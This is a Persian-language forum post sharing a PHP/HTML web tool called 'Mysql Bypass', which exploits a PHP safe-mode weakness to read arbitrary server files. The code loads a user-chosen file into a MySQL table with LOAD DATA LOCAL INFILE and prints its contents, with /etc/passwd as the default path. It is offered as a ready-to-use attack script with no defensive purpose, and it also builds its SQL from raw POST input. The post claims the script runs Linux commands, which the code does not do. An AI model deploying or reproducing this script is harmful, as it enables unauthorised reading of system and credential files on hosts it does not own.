با استفاده از این اسکریپت میتونید کامند های لینوکس خودتونو از طریق mysql سرور لینوکس اجرا و نتیجه بگیرید :
[align=left]
[/align]
[align=left]
کد:
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body text="#FFFFFF" bgcolor="#000000"> <p align="center"> <br> <font face="Tahoma" style="font-size: 15pt; font-weight: 700">XXXXXXXX Security Team<br> Mysql Bypass <br> </font><font face="Tahoma" size="2">4.4.7 / 5.2.3 PHP ver - MySQL Safe Mode Bypass Vulnerability<br> Create mysql database and add user for mysql database</font><font face="Tahoma" style="font-size: 10pt; font-weight: 700"><br> </font></p> <div align="center"> <form method="post"> <table border="0" cellspacing="1" width="859" height="6%"> <tr> <td width="311"><font face="Tahoma"><span style="font-size: 9pt"> DataBase Name : <input type="text" name="dbname" size="20"> </span></font></td> <td width="240"><font face="Tahoma"><span style="font-size: 9pt"> Username : <input type="text" name="dbuser" size="20"> </span></font></td> <td width="298"><font face="Tahoma"><span style="font-size: 9pt"> Password : <input type="text" name="dbpass" size="20"></span></font></td> </tr> <tr> <td width="311" valign="middle"> </td> <td width="240" valign="middle"> </td> <td width="298" valign="middle"> </td> </tr> <tr> <td width="554" valign="middle" colspan="2"> <p align="left"><font face="Tahoma"><span style="font-size: 9pt"> File Path : <input type="text" name="path1" size="45" style=" weight:200; height:21; width:229" dir="ltr" value="/etc/passwd"> <input type="submit" value="Bypass" name="exec"></span></font></td> <td width="298" valign="middle"> </td> </tr> <tr> <td width="855" valign="middle" colspan="3"> <br> <? if(!empty($_POST['dbname']) && !empty($_POST['dbuser']) && !empty($_POST['dbpass']) && !empty($_POST['path1'])) { $dbname = $_POST['dbname']; $dbuser = $_POST['dbuser']; $dbpass = $_POST['dbpass']; $path1 = $_POST['path1']; if(mysql_connect( "localhost", $dbuser, $dbpass )) { $drop= "DROP TABLE $dbname.`bypass`" ; $query = "CREATE TABLE $dbname.`bypass` (`fileview` VARCHAR( 2048 ) NOT NULL);"; mysql_query($drop); mysql_query($query); mysql_query("LOAD DATA LOCAL INFILE " . "'$path1'" . " INTO TABLE " . $dbname . ".bypass"); $result =mysql_db_query($dbname,"SELECT * FROM bypass "); $numrows = mysql_num_rows($result); ?> <textarea rows="15" name="result" cols="103"> <? while($row = mysql_fetch_array($result)) { echo $row[fileview] ; } } } ?> </textarea></td> </tr> </table> </form> </div>
نظر